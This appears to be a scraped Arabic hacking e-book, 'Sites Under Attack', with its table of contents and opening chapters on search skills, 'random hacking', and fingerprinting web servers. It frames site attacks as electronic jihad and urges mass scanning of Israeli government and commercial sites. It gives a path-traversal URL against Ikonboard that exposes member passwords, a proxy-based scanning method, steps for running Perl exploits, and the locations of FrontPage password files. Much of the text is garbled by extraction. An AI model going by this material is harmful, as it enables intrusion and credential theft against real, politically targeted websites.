Sites UnDeR UtTaCk www.3asfh.com/vb ١
Sites UndErAttaCk V.1
Sites UndErAttaCk V.1
- No tags were found...
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
<strong>١</strong>
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
المحتویات<br />
. .<strong>١</strong><br />
•<br />
.٢<br />
.٣<br />
.٤<br />
.٥<br />
.htaccess .٦<br />
.٧<br />
.FTP<br />
.٨<br />
.Finger<br />
.٩<br />
.<strong>١</strong>٠ شرحال .secure shell<br />
.<strong>١</strong><strong>١</strong> شرحمعنىال .Buffer Overflows<br />
CGI <strong>١</strong>٢<br />
•<br />
مق دم ة<br />
الف صلالأول ((مهارات وم صطلحاتأساسیة))<br />
كیفیةالبحثفيالإنترنت.<br />
الإختراقالعشوائي.<br />
الطریقةال صحیحة والمثلىفياختراقالمواقع.<br />
معلومات ع نالDNS.<br />
شرح ملف<br />
نظام نقلالملفات .FTP<br />
الإختراق عنطریق<br />
بروتوكول خدمة<br />
لا. وعلاقتها بالإنترنت.<br />
الف صلالثاني((الحمایة واالتخفي))<br />
<strong>١</strong>٣.الأمن و(((التخفي)))فيالإنترنت.<br />
<strong>١</strong>٤. حمایة هویتكفيالنت<br />
<strong>١</strong>٥.احمي نفسك وغطي افعالك.<br />
.<br />
.<strong>١</strong>٦ حمایةالمنتدیات .<br />
<strong>١</strong>٧.أمنالشبكات.<br />
<strong>١</strong>٨.م صطلحات مهمة للمبتدئینفياختراقالمواقع.<br />
<strong>١</strong>٩.داینامیكیةتدمیرالمواقع.<br />
.<br />
٢٠. شرح برنامجالدرةلتدمیرالمواقع .<br />
٢<strong>١</strong>.تدمیرالمواقع بدون برامج.<br />
٢٢. معلومات عن<br />
الف صلالثالث(( مقتطفات عنالسیرفرات والأنظمة))<br />
٢٣.الإختراق عنطریقالیونیكود الجز ءالأول).<br />
٢٤.الإختراق عنطریقالیونیكود الجزءالثاني).<br />
٢٥. معلومات عامة عن كیفیةالاستفادة منثغراتالیونیكود<br />
٢٦.الدلیلالكامل لإختراق سیرفر .IIS<br />
٢٧.دراسة مف صلة وبعمقفيالUniCode.<br />
٢٨.تدری ب على عملیةالإختراق بواسطةالیونیكود.<br />
٢٩.در س مف صل ع نالكوكیز.<br />
.Routing in the Internet<br />
Shadowلتحلیلالموقع Scan Security .<br />
)<br />
)<br />
) متوسط (.<br />
)<br />
)<br />
•<br />
٣٠. معلومات مهمة عنالموا قعالتيتدعمالفرونت بیج.<br />
س&ج>)فياختراقالمواقعبثغرةالفرونت بیج.<br />
٣٢. شرح برنامج<br />
٣٣.اماكن وجود مل فالباسوردفيأنظمةالتشغیل.<br />
٣٤.اختراقالموقع الجزءالأول).<br />
٣٥.اختراقالمواقع الجزءالثاني).<br />
٣٦.در سفياختراقالمواقع<br />
٣٧.اختراقالSQL.<br />
٣٨.در س مف صل ع نالSQL.<br />
٣٩.در س لإحترافالهاكفياختراقالمواقع.<br />
٤٠.استغلال لینك سفياختراقالمواقع.<br />
٤<strong>١</strong>. شرح مف صل منالألف إلىالیاءفياحترا فاختراقالمواقع عنطریق لینك س<br />
.<br />
>) .٣<strong>١</strong><br />
٤٢.درس عنالShell ) PHP<br />
٤٣.درس عنالShell ) PHP<br />
الجزءالأول).<br />
الجزءالثاني).<br />
٢
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
٤٤.درس عنالShell PHP (الجزءالثالث).<br />
.٤٥ شرحأداة .anmap<br />
٤٦. طریقةلإقتحامالسیرفرات بدونثغرات<br />
.<br />
.<br />
.<br />
.Cross Site Scripting .٤٧<br />
٤٨.كودتدمیر سجلالزوار.<br />
٤٩. شرح شبه مف صل ع نالثغرات<br />
٥٠.كیفتستخدمالثغرات.<br />
٥<strong>١</strong>.تمتعبإ ختراقالمواقعالإسرائیلیة مع ه ذهالثغرة<br />
٥٢.ثغرة نیوك.<br />
٥٣.ثغرة .Chunked<br />
٥٤.اختراقالمنتدیات من نوع<br />
.vBulletin2,2,0<br />
٥٥.ثغرةفي منتدیات2,2,9 .vBulletin<br />
٥٦.اختراق منتدیات<br />
٥٧.ثغرة جمیلةفي phpفيالمواقع.<br />
٥٨.ثغرةفي<br />
٥٩.ثغرهفي<br />
٦٠.ثغرةفي نو ع XMB م نالمنتدیات.<br />
.٦<strong>١</strong> شرحثغرة .philboard<br />
.phpbb 2.0.0<br />
.php nuke<br />
.Bandmin 1.4<br />
.٦٢ شرحثغرة .uploader.php<br />
٦٣.أف ضلالمنتدیاتالعربیة للهاكر .<br />
٦٤.أف ضل مواقعالأمن والهاكالإنجلیزیة.<br />
٦٥.الخاتمة.<br />
٣
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
....<br />
....<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
بسماالله الرحمن الرحیم<br />
الحمد الله ربالعالمین والصلاة والسلامالأتمانالأكملان على سیدالثقلان وهاديالانس والجان نبینا محمد<br />
سید ولد عدنان وعلى اله وصحبة وسلمتسلیماكثیرا<br />
من منطلقاهمیة هذا العلم والذي ن حنفياحوج ما نكونالیهالانفي وقتناالحالياحببناان یكونلنا<br />
نصیبفي الجهادالااالله بقدر ما نستطیعفكان هذا الكتاب بذرة عملنا المتواضع هذا والذي نسألاالله یوفقنا<br />
وان یسددنالمافیهالخیر والنفعلكل منارادانیعلي دینااللهفي هذاالمجالفلقدتكالب تاعداءاالله علینا<br />
منكل جانب وبدأت الحروبالالكترونیةتغزونا منكل صوب وناحیةفیجبالاستعدادللمواجهة واعداد<br />
العدة من مطلققولااللهتعالى ((وأعدوالهم مااستطعتم منقوة ومن رباطالخیلترهبونبه عدواالله<br />
وعدوكم ))فاحببناان نبدأفي سلسلةتعلیمیة هدفها ماقد ذكرناه سابقا منتقدیم ید العون والمساعدةبما<br />
فتحاالله علینا وعلىاخواننا حتى نكون یدا واحدة علىاعدائنا<br />
فاحببتفي هذا الكتابالتركیز على دراسة هذاالعلم دراسة وافیة والابتعاد عنكل ما یسمىبالبرامج<br />
فضررهااكبر من نفعها ولنبدأ سویةبالدراسةالوافیةالمركزة والمتقنه علىالانظمة والشبكات<br />
والسیرفرات والتوسعفیهافهي طریقناللسیطرةالالكترونیة وحمایةانفسناقبلكل شئفي هذا العالم<br />
المفتوحالذي یسیطر علیهقراصنة الاحتكار منأعداءاالله (......) .<br />
ولقدبدأنا ولا ندعيالكمالفمنارادتقدیمالمساعدةاو مد یدالعونباي مشاركةكان تفلهالاجر والثواب<br />
منااللهتعالى سواءباقتراحاو نصیحةاو مشاركة موضوعیةاو ...الخ<br />
<strong>Sites</strong> Under<br />
....<br />
-- مواقعتحتالهجوم -- ))<br />
...<br />
وهذا هوالجزء الأول من هذاالكتابالذياطلقنا علیهاسم<br />
((Attack وترقبواالجزء الثانيقریبا وفيانتظاراقتراحاتكم وماتجودبهانفسكمفي خدمة دینكم<br />
واخیرافانا نبریئ ذمتنااماماالله منكلاستخدام سئلما سنقدمهلكمفهو سلاح ذو حدین ....اللهم هل<br />
بلغنااللهمفاشهد<br />
ولقد نویناانتكونالمواضیعكلها من كتاباتنافأضفنا مواضیع من كتاباتنا ولكن رأینا منالاخوة ممنقد<br />
فتحاالله علیهمفي بع ضالمجالات وما كتبوههوأفضل مما سنكتبهفي بع ضالمواضیعلذلكتمارفاق<br />
مواضیعهمكما هي من غیرتعدیلالا مایتعلقبالتعدیلاتاللغویةاوالاخطاء الواضحة<br />
اذنفنصیبنا منالمواضیع ما یقارب ٤٠% والبقیةهي من نصیباخواننا ونسالااللهلهمالاجر والمثوبة<br />
على ماقدموه منمعلومات ستخدمامتهم ودینهمالىانتقوم الساعة<br />
وتقبلوات حیاتاخوانكم<br />
جمیعالحقوق محفوظةل:-<br />
.....<br />
....<br />
+++++++++++++++++++<br />
+ hi_HaCkEr –<br />
+ MaXhAk2000<br />
+++++++++++++++++++<br />
أبو مجاهد<br />
منتدیات العاصفة<br />
وااللهالموف ق،،،<br />
http://<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong> ****<br />
٤
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
الفصل الأول<br />
<br />
((مهاراتوصطلحات<br />
أ ساسیة))<br />
٥
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
كیفیة البحث في الإنترنت<br />
"<br />
"<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
.<br />
$$$$$$$$$$$<br />
الكاتب:بلاكهنتر<br />
$$$$$$$$$$$<br />
......<br />
لأهمیة هذاالموضو عبالنسبةلكل مخترق مواقعلكي ی حصل على ما یرید من مراجع حول نظاممعیناو<br />
برنامجمعیناوثغرةمعینةفهو مناكثرالناساستخدامالمحركات البح ث واسالوا مخترقيالمواقع عن<br />
اهمیة محركات البحثبالنسبةلهم .....<br />
ولابدانتعلمان محركاتالبحث ما وجدتاصلاالالأجلك لت حصل على ماترید وباقصر وقت ممكن ولابد<br />
انتعر فایضاانا غلبها متخص صفي مجالمعین علىالأغلبفلاتبح ث مثلا عنبرامج هكرفي محركات<br />
ب حث سیاسیة مثلا وهكذا ......<br />
بالنسبه مثلاللجوجلانااعتبرهالمحركالذكيفهویعر ف ماذا كتبت وانكنتقدأخطأتفي كتابة الكلمة<br />
فهوتلقائیا سیعطیكفي بدایةنتائج البحث سؤال ...هلانتتقصدكذا ... و غالبا ماتجدالذيكنتتب حث<br />
عنهفياوائل صفحاتنتیجة البح ث<br />
بالنسبهللیاهوهوایضا ذكي ولكن ذكائهیعتبر ذكاءتجاري حیثانه یقدملكالمواقع التجاریهالتيیتعامل<br />
معها وفیها ماكنتتب حث عنهثم المواقعالتجاریه ا لتي لایتعاملمعها المحركثمالمواقعالعامه وهي ما<br />
كنتتب حث عنه<br />
سؤال /الكثیر منالناس واناالاحظهاكثیرافمثلا عنديفيالمنتد ى وكذلكفي جمیعالمنتدیا تاجدالكثیر<br />
مثلا یطلب مثلابرنامجالسب سفن !!!!!!!!لماذ ؟ هذا مثال عنأشهربرنامجاختراق والامثلةكثیرة<br />
حسنا ...قليانت مالفر قبینك وبینالشخ صالذيتطلب منهبرنامجاو موقعمعیناو غیره وهو یستطیع<br />
ایجاده وانت لاتستطیع ؟؟؟<br />
صح //الفر قبینك وبین هذاالشخ ص ..ان هذاالشخ صیتمیز عنكبانه یجید التعامل مع محركاتالب حث<br />
على عكسكتماما<br />
الان سنقومبشرح الطریقة المثلى لعملیةالبح ث<br />
طریقهبسیطه جدا وهي عبرتقسیمالمواقعالى<br />
مواقعتجاریه ولها محركاتبح ث مهتمةبها<br />
مواقعبرامج ولها محركاتبح ث مهمةبها<br />
مواقع ملتیمیدیا ولها محركاتبح ث مهتمةبها<br />
مواقع سیاسیه واخباریه ولها محركاتبح ث مهتمةبها<br />
مواقع هاك ولها محركاتبح ث مهتمةبها<br />
مواقعكراك ولها محركاتبح ث مهتمةبها<br />
مواقع سكیوریتي ولها محركاتبح ث مهتمةبها<br />
مواقع هاردویر ولها محركاتبح ث مهتمةبها<br />
منتدیات ولها محركاتبح ث مهتمةبها<br />
وانا افضل دائما محركبحث جوجل لتوفر جمیع المجالات ضمنهتقریبا ولسوابقةالمشهودلهبها منكل<br />
هكرفهوبالنسبةلي افضل موقعلكل هكر<br />
طیبالاناذاأردت الب حث عنبرنامجمعین ما هيافضل واسر عالطر قللوصوللهذا البرنامج ؟<br />
انا متأكدبانكلوفكر تقلیلا ستجیب عليبهذاالاجابة ...<br />
....<br />
:<br />
:<br />
.....<br />
....<br />
٦
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
اولااذهبالى مواقع الب حث عن البرامج وأضعاسمالبرنامج المطلوب وفي نهایةاسمالبرنامجأضع<br />
الامتداد الذي غالبا ماتكون علیه هذهالبرامج<br />
أو<br />
مثلااناابح ث عنثغرهأعر ف نوعها ولكني لاأعر ف مصدرها وارید مرجعلها لزیادةالاطلا ع ماذاأفعل<br />
؟؟؟<br />
ولتكن مثلاثغراتال<br />
اذهباولالمواقعالسكیوریتياب حث عنكلمة XSS ستكونلدیكنتیجةبح ث لا بأسبها عن كل مایتعلق<br />
بها<br />
الجوجل سیعطیناكمیةكبیر منالمواقع والمراجعالمتعلقةبما نبحث عنهلذلك یجبان نضیق نطاقالب ح ث<br />
حول المطلوبفق ط ولذلك علي بتحدید البح ث بعلامه ) + ( واذااردت فعلياناب حث عنبجز Bugs و<br />
اكسبلویتباسم الثغره فعليان اكتب :<br />
مثلاابحثعن ثغرات IIS سأكتب<br />
وهكذا<br />
الان ساضعلكم مجموعه منالمواقعالتيقدتفیدكمفي عملیةالبح ث :<br />
prog.exe<br />
CSS واللياختصارها XSSاو Cross Site Scripte<br />
Prog.zip<br />
أواذهب الى جوجل واكتب xss+ exploit + bug<br />
XSS+BUG+EXPLOIT<br />
IIS+exploit+bug<br />
:<br />
اناأسمي هذا الموقعبخادم الهكرز وسید الهكرز وووووكل ما ست طلقه على هذاالموقعفهو یستحقأكثر<br />
/http://www.google.<strong>com</strong> :<br />
محركاتبحث عادیه ومتقدمه<br />
/http://www.altavista.<strong>com</strong> - /http://www.yahoo.<strong>com</strong> :<br />
/http://hotbot.lycos.<strong>com</strong> - /http://www.lycos.<strong>com</strong> -<br />
- http://news.bbc.co.uk/hi/arabic/news :<br />
http://www.aljazeera.net/ - http://arabic.cnn.<strong>com</strong>/<br />
مواقع سیاسیه واخباریه<br />
مواقع سكیوریتي :<br />
- http://www.securiteam.<strong>com</strong>/<br />
- http://www.ussrback.<strong>com</strong>/ - http://www.securityfocus.<strong>com</strong>/<br />
- http://www.ntsecurity.nu/ - http://www.ntbugtraq.<strong>com</strong>/<br />
http://www.ntsecurity.<strong>com</strong>/<br />
وأناتصلنياخرالثغرا ت علىبریدي من خلالالاشتراك یقوائمهم البریدیة وأنصحالجمیعبالاشتراكفي<br />
قوائمهمالبریدیة<br />
http://drivers.online.net.nz/<br />
- http://www.asus.<strong>com</strong>/ - http://nvidia.<strong>com</strong>/<br />
http://www.amdmb.<strong>com</strong>/ - http://intel.<strong>com</strong>/ -<br />
+++++++++++++++++++++++++++<br />
:<br />
مواقع هاردویر :<br />
أیضا هنالك بع ضالمهارات المهمةفيالتعامل مع محركاتالب حث<br />
*-*البحث ضمننتائجالبح ثالحالیة ..... تتیح بع ض محركات البح ث هذهالخاصیة واقرب مثال جوجل<br />
حیثاني مثلالكيأب حث عنثغرةمعینةفانياكتب مثلا exploit ثم بأسفلالصفحة ستجد خیارالب حث<br />
ضمن النتائ جالحالیة ....فاب حث عنثغرتك ضمن هذه النتائجالموجودةفمثلااكتب list.php3 لتعر ف<br />
الثغرة الموجودة ضمن هذاالبرنامج<br />
*-*أیضااستخدم + و –فمثلا<br />
Exploit + bug + anyprog<br />
فانالنتائج لابدانتحتوي على جمیعالكلماتالثلا ثفي جمیع النتائج<br />
.... وهكذا<br />
٧
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
Exploit - bug - anyprog<br />
فانكتخبرهبان النتائج یست حسنانتكونتحتوي على هذه الكلماتالثلا ثفانلمفضع الموجود سواء<br />
كلمتیناوكلمة<br />
..<br />
*-* " أقوى منتدیات هكر "<br />
عند الب حث عن مجموعةكلمات وبنفسالترتیبفاننا یجبان نحددها بقوسین صغیرینكالمثال الذي<br />
بلأعلى ... وهكذا...<br />
٨
hi_HaCkEr & MaXhAk2000<br />
"<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
:<br />
" الإختراق العشوائي<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$$<br />
الكاتب :<br />
$$$$$$$$$$<br />
الكندور<br />
-<br />
ماهو الإختراق العشوائي Random Hacking<br />
-تطویرهب حیث یصبح یب حث على إ ستثمارات غیرال<br />
-كی فتستغلايثغره بعدال حصول علیها<br />
CGIScripts<br />
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^<br />
- ماهو الإختراق العشوائي Random Hacking<br />
هوالبحثفيكمیهكبیره من المواقع عنثغره محدده ، وهذا سهل ویعودبمواقعكثیره جدا جاهزه<br />
للإختراق ، مثالبسیط جدا ، روح على محركب حث ، من محركاتالبح ثالتيتعتمد علىال spidersأو<br />
إرجعلشرح زوروفي ریاضیات<br />
العناكب مثل altavista.<strong>com</strong> وأكتب<br />
الب حث) مثلا نب حث عنلنكلملفبإسم<br />
كلهاتملك منتدى ،Ikonboard إفتح واحد منها وأبحثفيالمصدر الكود HTML عنالسكربت الذي<br />
بحثت عنه help.cgi لتعر فاین مكانه ،لنفر ض مكانههنا<br />
أكتب بعدالملف غیر العنوانلیصبح<br />
) ، link:xxxx.cgi or pl<br />
help.cgi ، link:help.cgi المواقعالمردودهلكنتیجهللب حث<br />
http://www.example.<strong>com</strong>/cgibin/help.cgi<br />
http://www.example.<strong>com</strong>/cgibin/help.cgi?helpon=../members/[member].cgi%00<br />
[]<br />
Ikonboard<br />
مع ملاحظهتغییر [member]بإسم عضو وبدون القوسین طبعا<br />
سو فیعر ضلكمعلوماتالعضوكامله ومن ظمنهاكلمة المرور وهذه الثغرهل المنتدى<br />
2.1.7 وهذالیسلب موضوعي ولكن هيبدایه ومثال لاتحفظهلأنيأحضرتأبس ط مثالفقطفیوجد غیره<br />
مئاتبل آلا ف ملفاتال CGIScriptتملكثغرات مثل هذه واغلب إ ستثماراتهاتكون من خلال<br />
لل حصول على مثل هذه ا لإ ستثماراتلثغرات ملفاتالسي جي آي سكریبت شو فالأرشی ف هذا وهولغته<br />
روسیهأعتقد ولكن ما یهملأننا نب حث عنال Exploitأو ا لإ ستثمار<br />
/http://www.secure.f2s.<strong>com</strong>/eng_ver/bugs<br />
وممكنتأخذإسمالمنتج مثلاوتضعهفي محركالب حثل /http://www.securiteam.<strong>com</strong><br />
وتشو فالنتائج ،أوتشتركفيالقائمهالبریدهل سیكیورتيفوكسفهي مفیده جداأنا شاركت منقبل فتره<br />
url<br />
وجداأعجبتبها وهي مختصهفيالأمن ولیسلثغراتالسي جي آ ي سكربت، یعنيامن واخبار وكل شئ<br />
.... ویوجدبرنامجتقدمه سیكیورتيفوكسيبإسم سیكیورتيفوك سبیجر ، هوبرنامج لتسهیل عملیه<br />
ال حصول على الأخبار ووو... الخ<br />
-تطویرهب حیث یصبح یب حث على إ ستثمارات غیرال<br />
!!<br />
CGIScripts<br />
(:<br />
ا لإختراقالعشوائيإ ذاكان فعلا عشوائي، یعنيتخترقاي موقع ولوبدون سببفهذههمجیه ،لكن<br />
ممكن نستفید منهإ حنافيأنه ما یكونفي شكل همجي ،أنااقوللككی ف ، مثلاإسرائیلالليالكل یكرهها<br />
، الذین یأمرونالفلسطینیین بأوقا فإ طلاق النار ،الكل یكرههملی سلأجلأنهم یهود ، لا نكرههملأنهم<br />
ظلموافلسطین ، عندهم موقعفیه آلا ف من مواقعهم هذاهو<br />
sitesتنتهيب <strong>١</strong>٢٦<strong>١</strong>٠ co.il و <strong>١</strong><strong>١</strong>٠٤<br />
٩
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
sites.تنتهيب gov.il وهذه مهمه ، و<br />
sitesتنتهيب sitesتنتهيب<br />
sites.تنتهيب<br />
و.<br />
sites.تنتهيب<br />
و. .il - sites ........عشانت حصل علىكل هذه السایت روح الموقع هذا<br />
ac.il و ٧٨<br />
org.il و ٧٠<br />
muni.il و sitesتنتهيب ٢٠٠٩ ، <strong>com</strong> و<br />
sites.تنتهيب ٥٤ net.il و ٢٩<br />
israel.net - 84 ، لعینه .edu - 4 sites org - 121 sites و net<br />
<strong>١</strong>٣٧<br />
sites<br />
http://iguide.co.il/sites/sites.htm<br />
وفیهكمان محركاتب حث<br />
/http://www.achla.co.il<br />
http://www.reshet.co.il/data/index.vs?dw=1<br />
/http://www.maven.co.il<br />
/http://www.tapuz.co.il<br />
/http://www.walla.co.il<br />
http://www.info.gov.il/find.pl<br />
وفیه محركأعدم منها والليهو<br />
altavista.co.il<br />
المهم علىكل شخ ص مناأن یصلحفرزللبیاناتالموجودهفي هذهالمواقع ، یستخدم اللغهالتي ی تقنها<br />
لیصنعبرنامج یصلحفرز ویضعهافي مل فتكستبدوناشیاءثانیهمعها<br />
/w 3 - msql<br />
العملیهالثانیههيالب حثفیهاكلها عن منتج ، مثلا ،الطریقه سهله جدا ،أولایتمالشبك مع<br />
بروكسي مثلا 8080: proxy.isp.net.sa وثم یرسللهأمر ، GET مثلاترسلللبروكسي<br />
cgi-<br />
GET http://www.<strong>com</strong>.il/cgi-bin/w3-msql/ HTTP/1.0<br />
*/* ،Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg<br />
Accept-Language: ar-sa<br />
(User-Agent: Mozilla/4.0 (<strong>com</strong>patible; MSIE 5.5; Windows 98<br />
Host: www.<strong>com</strong>.il<br />
Proxy-Connection: Keep-Alive<br />
وهو یطلب من البروكسيأحضارالموقع http://www.<strong>com</strong>.il/cgi-bin/،یتضح طلبنال<br />
،فيالحقیقه لا نب حث عنثغرات سي جي آي ، ولكن نب حث عنكل المواقعالتي یوجد<br />
بهاالمنتج ،WWWMSQL یعنيالمواقعالإسرائلیه مثلاالتي جمعناهافي مل فتكس تكلهاتأخذ واحد<br />
وثم یحفظ<br />
واحدوتدخلفي البرنامج الذي صممناهوترسل الى البروكسيبحثا عن<br />
ردالبروكسيفي مل ف خارجي ، وهكذا حتى ننتهي منكلالمواقع ، وثم نفتحالمل ف ونشو فالتيتمإیجاد<br />
المنتج WWWMSQL داخها والتيلم یوجد ، ونتوجهالى سیكیورتيفوكس والا سیكیورتيتیم والاأي<br />
موقع یعجبك واب حث عن ، w3-msql مثلافي سیكوتيتیم نجد Exploitل<br />
منالمتصفح ، وهو هنا<br />
http://www.securiteam.<strong>com</strong>/exploits/2WUQBRFS3A.html<br />
cgi-bin/w3-msql<br />
w3-msql یمكنتطبیقه<br />
/bin/w3-msql<br />
<strong>١</strong>٠
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
طریقهفح ص عده مواقعبحثا عن منتجفیهاأسمیهاانا Randomیعنيإختراق Hacking عشوائي ،<br />
ولكنلو فعلابحثت عن wفيالمواقعالإسرائلیهفأنا 3 - msql أقوللك بأنك ما را حتلقىكثیرأولنتجد<br />
شئ ، ممكنتب حث عن /vti_pvt_/ لترصدكل المواقع التيفیهافرون تبیج ، وطبعا بعد مایتم حفظكل<br />
المعلوماتالمسترجعه من البروكسيتكونبشكل HTML عشانكذاأنت خل المل ف یكونبنسق<br />
وافتحهوتجدكل المواقع ،اللي كتب عنها<br />
الخ ، من هذهالردودتعر فاللي نتفاوند والا موجود ولكن<br />
غیر مسموحبالوصولله الخبهذهالطریقهتعر ف اللي موجود علیه واللي مو موجود .....والباقي علیك<br />
html.*<br />
displayed.. The page cannot be واللي<br />
.... not found.... واللي Forbddien<br />
..<br />
-كی فتستغلايثغره بعدال حصول علیها؟؟<br />
إ ذاكانت url ما یبغالهافلسفه ،كود c وما عرف تتشغلهأوقابل تفیهأخطاءفممكنتب حث عنفرجون<br />
ثانيله ولكنبلغه perlأو Shell *.sh وهوالذي یقابل Batchفي ویندوزوتحدثنا عنهافيكوكب<br />
لغاتالبرمجه ، من الدوس بعد ماتثبتأكتی فبیرلأكتب perlإ exploit.pl ذاكان ال exploitبلغه<br />
بیرل ولكن طبعافیهأشیاءتغییرهافيالكود نفسه ، وهذهالأشیاءتكون مكتوبهبین علاماتالتعلیقات<br />
وأكید بتواجه مشاكلإ ذا ماتعر ف شئفيبیرل ،في هذهالناحیه لاتطلب شرحبالصور :)إ ذا رجعلك رد<br />
طویل ماقدرتتقراه ممكنتحفظالخرج عن طریق علامة > وثم مسافه وإسم المل ف مثلا<br />
(:<br />
perl<br />
exploit.pl > log.htm<br />
وبالنسبهللمنتجأكتی فبیرلفقطتواجهفیه مشاكل ،لأن بع ض ال Exploit كتبفيالإ صدارأربعه<br />
وممكن خمسه وممكن مایعمل زینفيأكتای فبیرللذلكقدتضطر لتغیر المفسر عندكأوتعدلفيالكود<br />
فیه مفسربیرل ممتاز<br />
وهذاكله یطلب خبرهفياللغه ، وعلىفكرهلیونكس أعمل على<br />
جداافضل منأكتی فبیرل بعشراتالمرات...<br />
( RedHat 6.2<br />
)<br />
<strong>١</strong><strong>١</strong>
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
الطریقة الصحیحة والمثلى في اختراق المواقع<br />
"<br />
...<br />
$$$$$$$$$$$$$$$<br />
الكاتب marwan911:<br />
$$$$$$$$$$$$$$$$<br />
اول خطوةفيالاختراق واللي هياخذالمعلومات<br />
یعنينعر ف الموقع الفلاني شنهوالملقماللي شغال علیه والنظام والخدماتاللي یدعمها.<br />
الملقماتاشهرها اثنین ::<br />
:IIS من مایكروسوفت وهذه ملیانةثغرا ت. (ومواقعقلیل مقفلةثغراتها)<br />
:apache من مجموعة مبرمجین متوزعینفيانحاء العالم واختراقها شبهصعب.<br />
طیب<br />
ال حین عندنا موقع<br />
وشلوننعر ف نظامالتشغیل والملقم والخدمات والمعلوما تكلها<br />
عندك الموقع http://www.netcraft.net<br />
ادخله<br />
تلاقي مربع<br />
هنات حطفیه الموقع الليتبيتعر فالمعلومات الليفوق<br />
مثلا نحط موقعالبیتالابی ض اللي هو whitehouse.org<br />
ملاحظة: نكتبه من غیر //:http ولا /الليبالا خیر<br />
http://uptime.netcraft.<strong>com</strong>/up/graph....whitehouse.org<br />
را ح یطلعلناالتالي<br />
The site www.whitehouse.org is running Microsoft-IIS/5.0 on Windows<br />
2000<br />
طیب<br />
ال حین عرفنامعلومتین مهمتین<br />
<strong>١</strong>٢
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
اول شيءانه شغال علىالملقم<br />
IIS5.0<br />
ثاني شيء شغال على نظام ویندوز<br />
حلو<br />
٢٠٠٠<br />
IIS5.0 علیه<br />
اول شيء نجربثغرات (راحاحطها بعدالموضو ع)إ ذا مانفع شيء نشو فثغرات نظام<br />
ویندوز ٢٠٠٠ (راحاح طالموقع بعد الموضو ع)<br />
طیب ..... ال حینفیه حاجةاسمها یونيكود ......هذهتختر قفیها عن طریقالمتصفح<br />
وماتمشيإلا مع ملقمات IIS وهي عبارة عن عناوین طویلةت حطها بعد عنوانالموقع. راحاحطامثلة<br />
علیها.<br />
طیبلنفر ضانه ماطلعفیهاثغرا ت؟<br />
نشو ف محتویاتالموقع نفسه<br />
نشو فإنكان عنده سجل زواراو منتد ىاواواو ونطلعثغراتها منالموقع اللي راحارفقهفي الرداللي<br />
بعدالموضوع.<br />
طیبلوكانالسیرفراباتشي؟<br />
خلونا ناخذ مثال موقعارانك arank.<strong>com</strong>.www<br />
لو حللناهبالنیتكرافت را ح نشو فالنتیجةالتالیة<br />
The site www.arank.<strong>com</strong> is running Apache/1.3.20 (Unix)<br />
mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6<br />
mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6<br />
on Linux<br />
طیب هنا یهمناثلا ثاشیاء<br />
طیب<br />
الملقم وهو apache 1.3.20 و دعمفرون تبیج FrontPage/5.0.2.2510 وهذه ملیانةثغرات<br />
والثال ث النظام وهو<br />
الملقم<br />
Linux<br />
اول شيءاباتشي منالملقماتالصعبة ا لإختراق إلا بع ضالإ صدارا ت منهافنحط هذه على جنب.<br />
نشو ف دعمالفرون تبیج<br />
<strong>١</strong>٣
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
زي ماقلناالفرون تبیج ملیانثغرات<br />
وثغراتهقویة وكثیرةتقریبا<br />
منها مجلد<br />
vti_pvt_ و<br />
private_ هذهاللي نحتاجها غیره مامنهفایدة<br />
داخلالمجلدین راح نلاقياربع ملفات مهمة وهي service.pwd و users.pwd و<br />
authors.pwd و adminstators.pwd ویعتبر هذااخطر مل ف<br />
